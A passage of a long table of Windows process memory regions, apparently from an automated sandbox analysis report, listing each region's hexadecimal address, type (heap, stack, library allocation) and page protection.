|
heap
|
page read and write
|
||
|
1F9C90C000
|
stack
|
page read and write
|
||
|
18001360000
|
heap
|
page read and write
|
||
|
1FFC52F8000
|
heap
|
page read and write
|
||
|
18001510000
|
heap
|
page readonly
|
||
|
7FF847C06000
|
trusted library allocation
|
page read and write
|
||
|
26917ED5000
|
heap
|
page read and write
|
||
|
7FF8BA24F000
|
unkown
|
page readonly
|
||
|
2E63ED30000
|
heap
|
page read and write
|
||
|
27124856000
|
heap
|
page read and write
|
||
|
1F4C9078000
|
trusted library allocation
|
page read and write
|
||
|
18001460000
|
heap
|
page read and write
|
||
|
2A320543000
|
heap
|
page read and write
|
||
|
7FF8B83EB000
|
unkown
|
page readonly
|
||
|
1FFC55E2000
|
heap
|
page read and write
|
||
|
1FFC526E000
|
heap
|
page read and write
|
||
|
1A72D98D000
|
heap
|
page read and write
|
||
|
1FFC529A000
|
heap
|
page read and write
|
||
|
7FF847C83000
|
trusted library allocation
|
page read and write
|
||
|
7FF847CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7DF11E000
|
unkown
|
page readonly
|
||
|
1FDE2910000
|
heap
|
page read and write
|
||
|
7FF8BA241000
|
unkown
|
page execute read
|
||
|
7FF847CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF847B00000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52F8000
|
heap
|
page read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF847C6A000
|
trusted library allocation
|
page read and write
|
||
|
97B71FE000
|
stack
|
page read and write
|
||
|
7FF8479C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2712644F000
|
trusted library allocation
|
page read and write
|
||
|
6C050F7000
|
stack
|
page read and write
|
||
|
180014A0000
|
heap
|
page read and write
|
||
|
1D6447C8000
|
heap
|
page read and write
|
||
|
7FF7471A0000
|
unkown
|
page readonly
|
||
|
18001535000
|
heap
|
page read and write
|
||
|
1FFC5298000
|
heap
|
page read and write
|
||
|
23E8AD30000
|
heap
|
page read and write
|
||
|
1801B3F3000
|
heap
|
page read and write
|
||
|
AE532FE000
|
unkown
|
page readonly
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
7FF67A0E2000
|
unkown
|
page readonly
|
||
|
1801B665000
|
heap
|
page read and write
|
||
|
2A32053E000
|
heap
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
AE53AFE000
|
unkown
|
page readonly
|
||
|
7FF847B20000
|
trusted library allocation
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
2DEB7480000
|
heap
|
page read and write
|
||
|
1FFC52BC000
|
heap
|
page read and write
|
||
|
7FF8BA240000
|
unkown
|
page readonly
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7810000
|
unkown
|
page read and write
|
||
|
224EBF8000
|
stack
|
page read and write
|
||
|
271268ED000
|
trusted library allocation
|
page read and write
|
||
|
1F4E0FD0000
|
heap
|
page execute and read and write
|
||
|
1801B510000
|
heap
|
page execute and read and write
|
||
|
AE531FD000
|
stack
|
page read and write
|
||
|
ACA8CFE000
|
stack
|
page read and write
|
||
|
7FF8B83E7000
|
unkown
|
page read and write
|
||
|
18003351000
|
trusted library allocation
|
page read and write
|
||
|
AE535FE000
|
stack
|
page read and write
|
||
|
C11D4FD000
|
stack
|
page read and write
|
||
|
7FF847960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D8E78F6000
|
heap
|
page read and write
|
||
|
1F4C8A60000
|
heap
|
page read and write
|
||
|
ACA91FE000
|
stack
|
page read and write
|
||
|
1F4E13F7000
|
heap
|
page read and write
|
||
|
1D8E7B02000
|
heap
|
page read and write
|
||
|
27124F5C000
|
trusted library allocation
|
page read and write
|
||
|
1D6448F0000
|
heap
|
page read and write
|
||
|
221CDA55000
|
heap
|
page read and write
|
||
|
7FF7471A0000
|
unkown
|
page readonly
|
||
|
1FFC52DD000
|
heap
|
page read and write
|
||
|
2A3205A6000
|
heap
|
page read and write
|
||
|
224EFBC000
|
stack
|
page read and write
|
||
|
20820E25000
|
heap
|
page read and write
|
||
|
26917BA0000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
ACA937B000
|
stack
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
AB0D2FD000
|
stack
|
page read and write
|
||
|
7FF8478B0000
|
trusted library allocation
|
page read and write
|
||
|
27126460000
|
trusted library allocation
|
page read and write
|
||
|
7FF67A0E1000
|
unkown
|
page execute read
|
||
|
1A72D9B9000
|
heap
|
page read and write
|
||
|
2A32054B000
|
heap
|
page read and write
|
||
|
18003DDB000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8360000
|
unkown
|
page readonly
|
||
|
27134D40000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7610000
|
heap
|
page read and write
|
||
|
224E8FF000
|
stack
|
page read and write
|
||
|
AE533FE000
|
stack
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7FF84795C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFC5250000
|
heap
|
page read and write
|
||
|
6C04B4F000
|
stack
|
page read and write
|
||
|
660F0000
|
unkown
|
page readonly
|
||
|
2A320563000
|
heap
|
page read and write
|
||
|
2712301B000
|
heap
|
page read and write
|
||
|
7FF8B83EB000
|
unkown
|
page readonly
|
||
|
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
|
18003E38000
|
trusted library allocation
|
page read and write
|
||
|
7FF747163000
|
unkown
|
page readonly
|
||
|
7FF67A0E2000
|
unkown
|
page readonly
|
||
|
27124C70000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B83E8000
|
unkown
|
page write copy
|
||
|
962B5FF000
|
unkown
|
page read and write
|
||
|
1F4E10B9000
|
heap
|
page read and write
|
||
|
ACA8E7D000
|
stack
|
page read and write
|
||
|
2437D050000
|
heap
|
page read and write
|
||
|
18003DB1000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7800000
|
unkown
|
page read and write
|
||
|
2DEB8F15000
|
heap
|
page read and write
|
||
|
1FFC5258000
|
heap
|
page read and write
|
||
|
1F4CA60B000
|
trusted library allocation
|
page read and write
|
||
|
1FDE29A0000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
221CD990000
|
trusted library allocation
|
page read and write
|
||
|
1F4E15F0000
|
heap
|
page read and write
|
||
|
232095A0000
|
heap
|
page read and write
|
||
|
7FF8A7ECE000
|
unkown
|
page readonly
|
||
|
20820E20000
|
heap
|
page read and write
|
||
|
7FF67A0E0000
|
unkown
|
page readonly
|
||
|
196F24E5000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF67A0E1000
|
unkown
|
page execute read
|
||
|
1FDE2930000
|
heap
|
page read and write
|
||
|
16B22EA0000
|
heap
|
page read and write
|
||
|
1D6448F5000
|
heap
|
page read and write
|
||
|
7FF8B83E7000
|
unkown
|
page write copy
|
||
|
1FDE29A7000
|
heap
|
page read and write
|
||
|
224F98E000
|
stack
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
20DCF3A0000
|
heap
|
page read and write
|
||
|
2A3205BA000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
1F4E1228000
|
heap
|
page read and write
|
||
|
E10937F000
|
stack
|
page read and write
|
||
|
7FF8BA241000
|
unkown
|
page execute read
|
||
|
7FF747100000
|
unkown
|
page readonly
|
||
|
1FFC553A000
|
heap
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
18013360000
|
trusted library allocation
|
page read and write
|
||
|
224E9F9000
|
stack
|
page read and write
|
||
|
18003DDF000
|
trusted library allocation
|
page read and write
|
||
|
1801B68B000
|
heap
|
page read and write
|
||
|
1F4E1130000
|
heap
|
page read and write
|
||
|
E10927C000
|
stack
|
page read and write
|
||
|
7FF847C23000
|
trusted library allocation
|
page read and write
|
||
|
1F4CA4F5000
|
trusted library allocation
|
page read and write
|
||
|
2A320535000
|
heap
|
page read and write
|
||
|
16B22D87000
|
heap
|
page read and write
|
||
|
180133BD000
|
trusted library allocation
|
page read and write
|
||
|
224EE3F000
|
stack
|
page read and write
|
||
|
1F4CA62F000
|
trusted library allocation
|
page read and write
|
||
|
1F4C8A40000
|
heap
|
page execute and read and write
|
||
|
1CFCAFF000
|
stack
|
page read and write
|
||
|
198F1C70000
|
heap
|
page read and write
|
||
|
1D8E78E7000
|
heap
|
page read and write
|
||
|
1F4C6FB3000
|
heap
|
page read and write
|
||
|
2A32059F000
|
heap
|
page read and write
|
||
|
1F4C9E51000
|
trusted library allocation
|
page read and write
|
||
|
2A320585000
|
heap
|
page read and write
|
||
|
18013351000
|
trusted library allocation
|
page read and write
|
||
|
18003DD6000
|
trusted library allocation
|
page read and write
|
||
|
27134D31000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
|
224ECB7000
|
stack
|
page read and write
|
||
|
20DCF3B0000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
66001000
|
unkown
|
page execute read
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
1801B681000
|
heap
|
page read and write
|
||
|
19E37790000
|
heap
|
page read and write
|
||
|
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
180012E5000
|
heap
|
page read and write
|
||
|
1FFC5274000
|
heap
|
page read and write
|
||
|
D28317E000
|
stack
|
page read and write
|
||
|
1F4CA040000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1801B3E3000
|
heap
|
page read and write
|
||
|
76418FB000
|
stack
|
page read and write
|
||
|
7FF8A7ECA000
|
unkown
|
page read and write
|
||
|
7FF847C10000
|
trusted library allocation
|
page read and write
|
||
|
221CDA02000
|
heap
|
page read and write
|
||
|
196F24E4000
|
heap
|
page read and write
|
||
|
1F5276C0000
|
heap
|
page read and write
|
||
|
1F4C7180000
|
trusted library allocation
|
page read and write
|
||
|
2712595C000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491A4000
|
trusted library allocation
|
page read and write
|
||
|
19E3782E000
|
heap
|
page read and write
|
||
|
27126651000
|
trusted library allocation
|
page read and write
|
||
|
18001520000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
2DEB74B0000
|
heap
|
page read and write
|
||
|
7FF8A9360000
|
unkown
|
page readonly
|
||
|
1DBD78D5000
|
heap
|
page read and write
|
||
|
2A320594000
|
heap
|
page read and write
|
||
|
2A320873000
|
heap
|
page read and write
|
||
|
27124C30000
|
trusted library allocation
|
page read and write
|
||
|
2713CED7000
|
heap
|
page execute and read and write
|
||
|
2437D180000
|
heap
|
page read and write
|
||
|
2A3207B1000
|
heap
|
page read and write
|
||
|
2712644D000
|
trusted library allocation
|
page read and write
|
||
|
1F4C71D5000
|
heap
|
page read and write
|
||
|
1FFC5287000
|
heap
|
page read and write
|
||
|
2713D1FD000
|
heap
|
page read and write
|
||
|
1F4E13A7000
|
heap
|
page read and write
|
||
|
27122FAA000
|
heap
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8361000
|
unkown
|
page execute read
|
||
|
682A4000
|
unkown
|
page write copy
|
||
|
7FF847C56000
|
trusted library allocation
|
page read and write
|
||
|
588C3CF000
|
stack
|
page read and write
|
||
|
1F4E109B000
|
heap
|
page read and write
|
||
|
7FF847C80000
|
trusted library allocation
|
page read and write
|
||
|
224E87F000
|
stack
|
page read and write
|
||
|
2A320583000
|
heap
|
page read and write
|
||
|
221CD930000
|
heap
|
page read and write
|
||
|
6C05F8D000
|
stack
|
page read and write
|
||
|
1F4D8EDE000
|
trusted library allocation
|
page read and write
|
||
|
7FF847B70000
|
trusted library allocation
|
page read and write
|
||
|
1F4E134F000
|
heap
|
page read and write
|
||
|
7FF8A812B000
|
unkown
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
D282D7B000
|
stack
|
page read and write
|
||
|
232094A0000
|
heap
|
page read and write
|
||
|
6C051B9000
|
stack
|
page read and write
|
||
|
20DCF3A5000
|
heap
|
page read and write
|
||
|
1FFC52A9000
|
heap
|
page read and write
|
||
|
1FFC5292000
|
heap
|
page read and write
|
||
|
1F4D8E71000
|
trusted library allocation
|
page read and write
|
||
|
1F4E12D8000
|
heap
|
page read and write
|
||
|
2A320543000
|
heap
|
page read and write
|
||
|
2DEB74D9000
|
heap
|
page read and write
|
||
|
2A320450000
|
heap
|
page read and write
|
||
|
2713D010000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF847C20000
|
trusted library allocation
|
page read and write
|
||
|
23E8B145000
|
heap
|
page read and write
|
||
|
23E8AEC9000
|
heap
|
page read and write
|
||
|
1FFC52DA000
|
heap
|
page read and write
|
||
|
1D6447C7000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
6C0543E000
|
stack
|
page read and write
|
||
|
1F4C9EF9000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8360000
|
unkown
|
page readonly
|
||
|
20DCF137000
|
heap
|
page read and write
|
||
|
2E63EFA0000
|
heap
|
page read and write
|
||
|
2A320599000
|
heap
|
page read and write
|
||
|
2DEB8F10000
|
heap
|
page read and write
|
||
|
F3B26FF000
|
unkown
|
page read and write
|
||
|
7FF67A0E4000
|
unkown
|
page readonly
|
||
|
1FFC52DF000
|
heap
|
page read and write
|
||
|
1F4E134D000
|
heap
|
page read and write
|
||
|
1F4C8B05000
|
heap
|
page read and write
|
||
|
20DCF300000
|
heap
|
page read and write
|
||
|
1F4E126F000
|
heap
|
page read and write
|
||
|
D282E78000
|
stack
|
page read and write
|
||
|
2A320594000
|
heap
|
page read and write
|
||
|
7FF7471A6000
|
unkown
|
page readonly
|
||
|
731C1FF000
|
unkown
|
page read and write
|
||
|
962B6FF000
|
stack
|
page read and write
|
||
|
1F4E1220000
|
heap
|
page read and write
|
||
|
27123040000
|
heap
|
page read and write
|
||
|
1DBD77F0000
|
heap
|
page read and write
|
||
|
2437D08A000
|
heap
|
page read and write
|
||
|
2713CFF0000
|
heap
|
page read and write
|
||
|
1F527935000
|
heap
|
page read and write
|
||
|
7FF7DF11E000
|
unkown
|
page readonly
|
||
|
1C437694000
|
heap
|
page read and write
|
||
|
2713CD3B000
|
heap
|
page read and write
|
||
|
19E37C20000
|
heap
|
page read and write
|
||
|
2713D208000
|
heap
|
page read and write
|
||
|
18003E32000
|
trusted library allocation
|
page read and write
|
||
|
C14F3DA000
|
stack
|
page read and write
|
||
|
27123220000
|
heap
|
page read and write
|
||
|
7FF67A0E4000
|
unkown
|
page readonly
|
||
|
1DBD5F58000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
27124D31000
|
trusted library allocation
|
page read and write
|
||
|
2A3205BE000
|
heap
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF847B90000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7915000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
1FFC526A000
|
heap
|
page read and write
|
||
|
1FFC5272000
|
heap
|
page read and write
|
||
|
27126937000
|
trusted library allocation
|
page read and write
|
||
|
2437D0A3000
|
heap
|
page read and write
|
||
|
682A5000
|
unkown
|
page readonly
|
||
|
8FD6CFC000
|
stack
|
page read and write
|
||
|
1F4CA6EE000
|
trusted library allocation
|
page read and write
|
||
|
20820D40000
|
heap
|
page read and write
|
||
|
26917C1A000
|
heap
|
page read and write
|
||
|
2537E4A4000
|
heap
|
page read and write
|
||
|
66000000
|
unkown
|
page readonly
|
||
|
1FFC5283000
|
heap
|
page read and write
|
||
|
68280000
|
unkown
|
page readonly
|
||
|
2A3205DE000
|
heap
|
page read and write
|
||
|
1F4E1363000
|
heap
|
page read and write
|
||
|
2A3207B2000
|
heap
|
page read and write
|
||
|
1FFC5510000
|
heap
|
page read and write
|
||
|
1FFC52AE000
|
heap
|
page read and write
|
||
|
7FF7DF11B000
|
unkown
|
page read and write
|
||
|
7FF7471A0000
|
unkown
|
page readonly
|
||
|
1FFC5277000
|
heap
|
page read and write
|
||
|
271264E4000
|
trusted library allocation
|
page read and write
|
||
|
6C04E7E000
|
stack
|
page read and write
|
||
|
1A72D9C8000
|
heap
|
page read and write
|
||
|
1FDE2830000
|
heap
|
page read and write
|
||
|
224FC0C000
|
stack
|
page read and write
|
||
|
660F4000
|
unkown
|
page write copy
|
||
|
1F4C6F8C000
|
heap
|
page read and write
|
||
|
1F9CD7E000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF74719C000
|
unkown
|
page read and write
|
||
|
196F215A000
|
heap
|
page read and write
|
||
|
2437D055000
|
heap
|
page read and write
|
||
|
2002C20B000
|
heap
|
page read and write
|
||
|
1F4CA170000
|
trusted library allocation
|
page read and write
|
||
|
2437CF70000
|
heap
|
page read and write
|
||
|
7FF847C75000
|
trusted library allocation
|
page read and write
|
||
|
27126490000
|
trusted library allocation
|
page read and write
|
||
|
224ED3C000
|
stack
|
page read and write
|
||
|
7FF7DF117000
|
unkown
|
page readonly
|
||
|
23E8B140000
|
heap
|
page read and write
|
||
|
2A3205E0000
|
heap
|
page read and write
|
||
|
1D8E7780000
|
heap
|
page readonly
|
||
|
1F4D8EBE000
|
trusted library allocation
|
page read and write
|
||
|
16B22E70000
|
heap
|
page read and write
|
||
|
1F4D8EDA000
|
trusted library allocation
|
page read and write
|
||
|
1F4D8EF8000
|
trusted library allocation
|
page read and write
|
||
|
27124860000
|
heap
|
page read and write
|
||
|
2002C225000
|
heap
|
page read and write
|
||
|
1A72D9B7000
|
heap
|
page read and write
|
||
|
1A72D98B000
|
heap
|
page read and write
|
||
|
2A32055E000
|
heap
|
page read and write
|
||
|
27122F80000
|
heap
|
page read and write
|
||
|
1801B3D4000
|
heap
|
page read and write
|
||
|
1F4C98AC000
|
trusted library allocation
|
page read and write
|
||
|
196F2360000
|
heap
|
page read and write
|
||
|
1FFC52D6000
|
heap
|
page read and write
|
||
|
7FF8A7F01000
|
unkown
|
page execute read
|
||
|
1800129F000
|
heap
|
page read and write
|
||
|
1FFC52F8000
|
heap
|
page read and write
|
||
|
2A320510000
|
heap
|
page read and write
|
||
|
2A320874000
|
heap
|
page read and write
|
||
|
7FF8A8127000
|
unkown
|
page read and write
|
||
|
C54B97F000
|
stack
|
page read and write
|
||
|
1FFC531B000
|
heap
|
page read and write
|
||
|
1DBD5E20000
|
heap
|
page read and write
|
||
|
1F4E13BD000
|
heap
|
page read and write
|
||
|
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
196F2177000
|
heap
|
page read and write
|
||
|
2713D1F6000
|
heap
|
page read and write
|
||
|
2A320545000
|
heap
|
page read and write
|
||
|
1D8E83A0000
|
remote allocation
|
page read and write
|
||
|
23209480000
|
heap
|
page read and write
|
||
|
2437D1A0000
|
heap
|
page read and write
|
||
|
68297000
|
unkown
|
page readonly
|
||
|
ACA9D4E000
|
stack
|
page read and write
|
||
|
7FF847C54000
|
trusted library allocation
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
6C04F7E000
|
stack
|
page read and write
|
||
|
1F4E129C000
|
heap
|
page read and write
|
||
|
7FF847BD0000
|
trusted library allocation
|
page read and write
|
||
|
1F4C71A0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52C3000
|
heap
|
page read and write
|
||
|
6C054BB000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
7FF67A0E0000
|
unkown
|
page readonly
|
||
|
1FFC5285000
|
heap
|
page read and write
|
||
|
1FFC5318000
|
heap
|
page read and write
|
||
|
1F4C8ED0000
|
trusted library allocation
|
page read and write
|
||
|
ACA8EFE000
|
stack
|
page read and write
|
||
|
80E57FD000
|
stack
|
page read and write
|
||
|
7FF847C25000
|
trusted library allocation
|
page read and write
|
||
|
20E692D8000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
2002C300000
|
heap
|
page read and write
|
||
|
2A32057B000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1800344D000
|
trusted library allocation
|
page read and write
|
||
|
180014E0000
|
trusted library allocation
|
page read and write
|
||
|
C54B87D000
|
stack
|
page read and write
|
||
|
7FF7DF117000
|
unkown
|
page readonly
|
||
|
1F4C8B00000
|
heap
|
page read and write
|
||
|
232094AA000
|
heap
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF847C1A000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8B18000
|
unkown
|
page readonly
|
||
|
18003DD2000
|
trusted library allocation
|
page read and write
|
||
|
2537E330000
|
heap
|
page read and write
|
||
|
18003453000
|
trusted library allocation
|
page read and write
|
||
|
2A320597000
|
heap
|
page read and write
|
||
|
7FF849290000
|
trusted library allocation
|
page read and write
|
||
|
7FF847BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8BA240000
|
unkown
|
page readonly
|
||
|
2A3205AB000
|
heap
|
page read and write
|
||
|
20820B50000
|
heap
|
page read and write
|
||
|
1A72D920000
|
heap
|
page read and write
|
||
|
1F4CA69D000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52F8000
|
heap
|
page read and write
|
||
|
7FF7DF110000
|
unkown
|
page readonly
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
2A320575000
|
heap
|
page read and write
|
||
|
196F2130000
|
heap
|
page read and write
|
||
|
ACA927E000
|
stack
|
page read and write
|
||
|
232094C3000
|
heap
|
page read and write
|
||
|
1FFC5308000
|
heap
|
page read and write
|
||
|
7DF4FA300000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8A7EC7000
|
unkown
|
page read and write
|
||
|
7FF8A812A000
|
unkown
|
page write copy
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
1F4E1010000
|
heap
|
page read and write
|
||
|
2712643C000
|
trusted library allocation
|
page read and write
|
||
|
7FF8B8360000
|
unkown
|
page readonly
|
||
|
588C34C000
|
stack
|
page read and write
|
||
|
6C05F0E000
|
stack
|
page read and write
|
||
|
20820D20000
|
heap
|
page read and write
|
||
|
7FF847AB0000
|
trusted library allocation
|
page read and write
|
||
|
23E8AFB0000
|
heap
|
page read and write
|
||
|
6601E000
|
unkown
|
page readonly
|
||
|
1F4C6F7A000
|
heap
|
page read and write
|
||
|
1FFC52E2000
|
heap
|
page read and write
|
||
|
1D6448A0000
|
heap
|
page read and write
|
||
|
27126A14000
|
trusted library allocation
|
page read and write
|
||
|
26917ED4000
|
heap
|
page read and write
|
||
|
1FFC526D000
|
heap
|
page read and write
|
||
|
224FB8C000
|
stack
|
page read and write
|
||
|
1FFC5291000
|
heap
|
page read and write
|
||
|
1D8E78F2000
|
heap
|
page read and write
|
||
|
1FFC52E3000
|
heap
|
page read and write
|
||
|
20E69290000
|
heap
|
page read and write
|
||
|
7FF847986000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FFC5280000
|
heap
|
page read and write
|
||
|
1F4C9E15000
|
trusted library allocation
|
page read and write
|
||
|
2A32059B000
|
heap
|
page read and write
|
||
|
1C437570000
|
heap
|
page read and write
|
||
|
1FFC5318000
|
heap
|
page read and write
|
||
|
9EEE5FF000
|
stack
|
page read and write
|
||
|
7FF847AF0000
|
trusted library allocation
|
page read and write
|
||
|
26917ED0000
|
heap
|
page read and write
|
||
|
7FF747163000
|
unkown
|
page readonly
|
||
|
7FF847BF8000
|
trusted library allocation
|
page read and write
|
||
|
1D8E7813000
|
unkown
|
page read and write
|
||
|
20DCF0F0000
|
heap
|
page read and write
|
||
|
20820B59000
|
heap
|
page read and write
|
||
|
7FF847C88000
|
trusted library allocation
|
page read and write
|
||
|
6C04FFE000
|
stack
|
page read and write
|
||
|
27122FA8000
|
heap
|
page read and write
|
||
|
2A320560000
|
heap
|
page read and write
|
||
|
7FF8B83E9000
|
unkown
|
page read and write
|
||
|
7FF8478A0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC5318000
|
heap
|
page read and write
|
||
|
2A3205CE000
|
heap
|
page read and write
|
||
|
1D8E7B10000
|
heap
|
page read and write
|
||
|
1FFC530A000
|
heap
|
page read and write
|
||
|
1FFC52BF000
|
heap
|
page read and write
|
||
|
1D8E83A0000
|
remote allocation
|
page read and write
|
||
|
2A3205BA000
|
heap
|
page read and write
|
||
|
7FF847C58000
|
trusted library allocation
|
page read and write
|
||
|
94528FC000
|
stack
|
page read and write
|
||
|
ACA8DFE000
|
stack
|
page read and write
|
||
|
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
|
1FFC52AB000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
2A320490000
|
heap
|
page read and write
|
||
|
19E379F5000
|
heap
|
page read and write
|
||
|
922A9FF000
|
stack
|
page read and write
|
||
|
2002C030000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7FF7471A0000
|
unkown
|
page readonly
|
||
|
7FF847A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F4C9327000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2002C20D000
|
heap
|
page read and write
|
||
|
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
|
2A320532000
|
heap
|
page read and write
|
||
|
27123225000
|
heap
|
page read and write
|
||
|
7FF8BA241000
|
unkown
|
page execute read
|
||
|
1FFC5210000
|
heap
|
page read and write
|
||
|
2A32057D000
|
heap
|
page read and write
|
||
|
23E8AEB0000
|
heap
|
page read and write
|
||
|
1FFC5564000
|
heap
|
page read and write
|
||
|
1FDE2975000
|
heap
|
page read and write
|
||
|
ACA8FF7000
|
stack
|
page read and write
|
||
|
20DCF133000
|
heap
|
page read and write
|
||
|
180034B1000
|
trusted library allocation
|
page read and write
|
||
|
1F9CC7E000
|
stack
|
page read and write
|
||
|
16B22D6C000
|
heap
|
page read and write
|
||
|
1FFC5420000
|
heap
|
page read and write
|
||
|
1F4E10CF000
|
heap
|
page read and write
|
||
|
7FF848FF4000
|
trusted library allocation
|
page read and write
|
||
|
34961DC000
|
stack
|
page read and write
|
||
|
180012A7000
|
heap
|
page read and write
|
||
|
7FF849280000
|
trusted library allocation
|
page read and write
|
||
|
1801B980000
|
heap
|
page read and write
|
||
|
196F2340000
|
heap
|
page read and write
|
||
|
7FF7DF111000
|
unkown
|
page execute read
|
||
|
7FF847B60000
|
trusted library allocation
|
page read and write
|
||
|
1D6447A0000
|
heap
|
page read and write
|
||
|
196B07F000
|
stack
|
page read and write
|
||
|
1FFC526D000
|
heap
|
page read and write
|
||
|
34965FF000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
18003373000
|
trusted library allocation
|
page read and write
|
||
|
2A3205DD000
|
heap
|
page read and write
|
||
|
8AEA3FF000
|
stack
|
page read and write
|
||
|
7FF8BA240000
|
unkown
|
page readonly
|
||
|
1F4E121C000
|
heap
|
page read and write
|
||
|
7FF8491A9000
|
trusted library allocation
|
page read and write
|
||
|
F3B27FF000
|
stack
|
page read and write
|
||
|
80E59FF000
|
stack
|
page read and write
|
||
|
1C437690000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7FF847BC0000
|
trusted library allocation
|
page read and write
|
||
|
26917C10000
|
heap
|
page read and write
|
||
|
1F5277D0000
|
heap
|
page read and write
|
||
|
6C0533E000
|
stack
|
page read and write
|
||
|
2A320537000
|
heap
|
page read and write
|
||
|
1FFC5317000
|
heap
|
page read and write
|
||
|
2E63EE70000
|
heap
|
page read and write
|
||
|
D2829CF000
|
stack
|
page read and write
|
||
|
7FF847AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491C0000
|
trusted library allocation
|
page read and write
|
||
|
1F4E1224000
|
heap
|
page read and write
|
||
|
221CDA00000
|
heap
|
page read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
2002C455000
|
heap
|
page read and write
|
||
|
1FFC5287000
|
heap
|
page read and write
|
||
|
18003340000
|
heap
|
page execute and read and write
|
||
|
1D8E7A02000
|
heap
|
page read and write
|
||
|
18002E30000
|
heap
|
page read and write
|
||
|
6C0523C000
|
stack
|
page read and write
|
||
|
7FF67A0E2000
|
unkown
|
page readonly
|
||
|
23E8AE30000
|
heap
|
